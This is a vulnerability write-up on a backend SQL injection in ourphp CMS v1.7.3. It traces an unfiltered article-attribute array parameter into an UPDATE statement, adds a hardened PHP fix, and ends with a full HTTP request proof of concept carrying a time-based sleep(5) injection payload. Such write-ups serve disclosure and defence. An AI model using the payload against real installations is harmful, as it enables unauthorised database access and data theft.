ourphp latest version (v1.7.3): backend SQL injection

Posted by Reborn


Version:

<?php
/*******************************************************************************
 * Ourphp - CMS site-building system
 * Copyright (C) 2017 www.ourphp.net
 * Developer: Harbin Weicheng Technology Co., Ltd.
 *******************************************************************************/
$ourphp_version="v1.7.3";
$ourphp_versiondate="20170615";
$ourphp_weixin="close";
$ourphp_apps="close";
$ourphp_alifuwu="close";
?>

First, look at index.php.

It loads the following files:

include './config/ourphp_code.php';
include './config/ourphp_config.php';
include './config/ourphp_version.php';
include './config/ourphp_Language.php';
include './function/ourphp_function.class.php';
include './function/ourphp/Smarty.class.php';
include './function/ourphp_system.class.php';
include './function/ourphp_template.class.php';

Among them, ourphp_function.class.php contains the security filtering functions.

Search the whole code base for uses of $_POST.

I picked one occurrence and followed it:

\client\manage\ourphp_articleview.php, line 71

$query = $db -> update("`ourphp_article`",
    "`OP_Articletitle` = '".admin_sql($_POST["OP_Articletitle"]).
    "',`OP_Articleauthor` = '".admin_sql($_POST["OP_Articleauthor"]).
    "',`OP_Articlesource` = '".admin_sql($_POST["OP_Articlesource"]).
    "',`time` = '".date("Y-m-d H:i:s").
    "',`OP_Articlecontent` = '".admin_sql($_POST["OP_Articlecontent"]).
    "',`OP_Tag` = '".$wordtag.
    "',`OP_Class` = '".$OP_Articleclass[0].
    "',`OP_Lang` = '".$OP_Articleclass[1].
    "',`OP_Sorting` = '".admin_sql($_POST["OP_Articlesorting"]).
    "',`OP_Attribute` = '".$OP_Articleattribute.          // not passed through admin_sql
    "',`OP_Url` = '".admin_sql($_POST["OP_Articleurl"]).
    "',`OP_Description` = '".compress_html($OP_Articlecontent).
    "',`OP_Minimg` = '".$OP_Minimg."'",
    "where id = ".intval($_GET['id']));

Most of the parameters pass through the admin_sql function, but $OP_Articleattribute does not.

Searching for $OP_Articleattribute reveals:

\client\manage\ourphp_articleview.php, lines 47-51

if (!empty($_POST["OP_Articleattribute"])){
    $OP_Articleattribute = implode(',',$_POST["OP_Articleattribute"]);
}else{
    $OP_Articleattribute = '';
}

Clearly it is not filtered here either.

This is an injection point inside an UPDATE statement, and nothing is echoed back, so error-based injection cannot be used.

From the handling of $OP_Articleattribute above, we know the parameter has to be passed as an array.

The SQL statement captured by monitoring is:

update `ourphp_article` set `OP_Articletitle` = '世界,你好!',`OP_Articleauthor` = '',`OP_Articlesource` = '',`time` = '2017-08-10 12:05:16',`OP_Articlecontent` = '世界,你好!',`OP_Tag` = '',`OP_Class` = '3',`OP_Lang` = 'cn',`OP_Sorting` = '99',`OP_Attribute` = 'aaaaaaaaaaaaa,xxxxxxxxx'',`OP_Url` = '',`OP_Description` = '世界,你好!',`OP_Minimg` = 'skin/noimage.png' where id = 3

The single quote is carried straight into the query.
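A hardened replacement for the attribute handling at lines 47-51, shown here as an added example and not code from the ourphp project. It assumes, beyond what the page states, that the column only ever holds a comma-separated list of short alphanumeric tokens and that a PDO connection is available for the update.

```php
<?php
// Added example, not ourphp project code: a hardened replacement for the
// OP_Articleattribute handling at lines 47-51 of ourphp_articleview.php.
// Assumptions (not stated on the page): the column only ever holds a
// comma-separated list of short alphanumeric tokens, and a PDO connection
// is available for the update.

// Returns the normalised comma-separated list, or null when the request
// value is not an array of plain tokens. The original code trusted
// implode() on whatever array the client sent.
function sanitize_attribute_list($input): ?string
{
    if (!is_array($input)) {
        return null;                                // missing or scalar: reject
    }
    $clean = [];
    foreach ($input as $item) {
        // Strict whitelist: letters, digits, underscore, 1 to 32 chars.
        if (!is_string($item) || !preg_match('/^[A-Za-z0-9_]{1,32}$/', $item)) {
            return null;                            // one bad element fails the list
        }
        $clean[] = $item;
    }
    return implode(',', $clean);
}

// Writes the column with a bound parameter, so the value is data only,
// independent of what the whitelist above happens to allow.
function update_article_attribute(PDO $pdo, int $id, string $attribute): bool
{
    $stmt = $pdo->prepare(
        'UPDATE `ourphp_article` SET `OP_Attribute` = :attr WHERE `id` = :id'
    );
    return $stmt->execute([':attr' => $attribute, ':id' => $id]);
}

// Constructed inputs: the benign list from the page and the same list with
// the stray single quote that the monitored statement showed being carried in.
$benign = ['aaaaaaaaaaaaa', 'xxxxxxxxx'];
$quoted = ['aaaaaaaaaaaaa', "xxxxxxxxx'"];
var_dump(sanitize_attribute_list($benign));        // "aaaaaaaaaaaaa,xxxxxxxxx"
var_dump(sanitize_attribute_list($quoted));        // NULL, rejected before any SQL is built
var_dump(sanitize_attribute_list('not-an-array')); // NULL
```

The validator is the short-term fix for this one parameter; the prepared statement is what removes the class of bug from every field that the page shows being concatenated into the query.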


Finally, the PoC:

POST /client/manage/ourphp_articleview.php?ourphp_cms=edit&id=3&page=1 HTTP/1.1
Host: localhost.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pnti0rkun1s1rrqhhl9n6lqdr1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 484

OP_Articleclass=3%7Ccn&OP_Articletitle=%E4%B8%96%E7%95%8C%EF%BC%8C%E4%BD%A0%E5%A5%BD%EF%BC%81&OP_Articleauthor=&OP_Articlesource=&a_upimg=skin%2Fnoimage.png&OP_Articlecontent=%E4%B8%96%E7%95%8C%EF%BC%8C%E4%BD%A0%E5%A5%BD%EF%BC%81&OP_Articlesorting=99&OP_Articleurl=&OP_Articletag=&OP_Articledescription=%E4%B8%96%E7%95%8C%EF%BC%8C%E4%BD%A0%E5%A5%BD%EF%BC%81&submit=%E6%8F%90%2B%E4%BA%A4&OP_Articleattribute[0]=aaaaaaaaaaaaa&OP_Articleattribute[1]=xxxxxxxxx' where 1=1 and sleep(5)-- -
